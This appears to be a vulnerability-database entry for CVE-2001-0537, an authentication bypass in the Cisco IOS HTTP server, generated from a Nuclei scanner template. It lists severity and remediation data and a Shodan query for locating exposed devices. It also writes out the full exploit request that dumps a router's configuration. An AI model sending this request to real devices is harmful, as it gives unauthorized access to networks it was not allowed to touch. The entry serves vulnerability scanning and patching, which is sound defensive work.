| Title | Cisco IOS HTTP Configuration - Authentication Bypass |
|---|---|
| Author | DhiyaneshDK |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could lead to unauthorized access to the affected device. |
| Remediation | Apply the appropriate patch or upgrade to a fixed version of the Cisco IOS software. |
| CVSS Score | 9.3 |
| EPSS Score | 0.93696 |
| CVE ID | CVE-2001-0537 |
| CWE ID | CWE-287 |
| Shodan Query | product:"Cisco IOS http config" && 200product:"cisco ios http config"cpe:"cpe:2.3:o:cisco:ios" |
| Tags | cve cve2001 cisco ios auth-bypass vkev vuln |
HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL.
GET /level/16/exec/show/config/CR HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2001/CVE-2001-0537.yaml
🦈 Packet Capture: ⬇️ Download cve-2001-0537.pcap
N/AN/A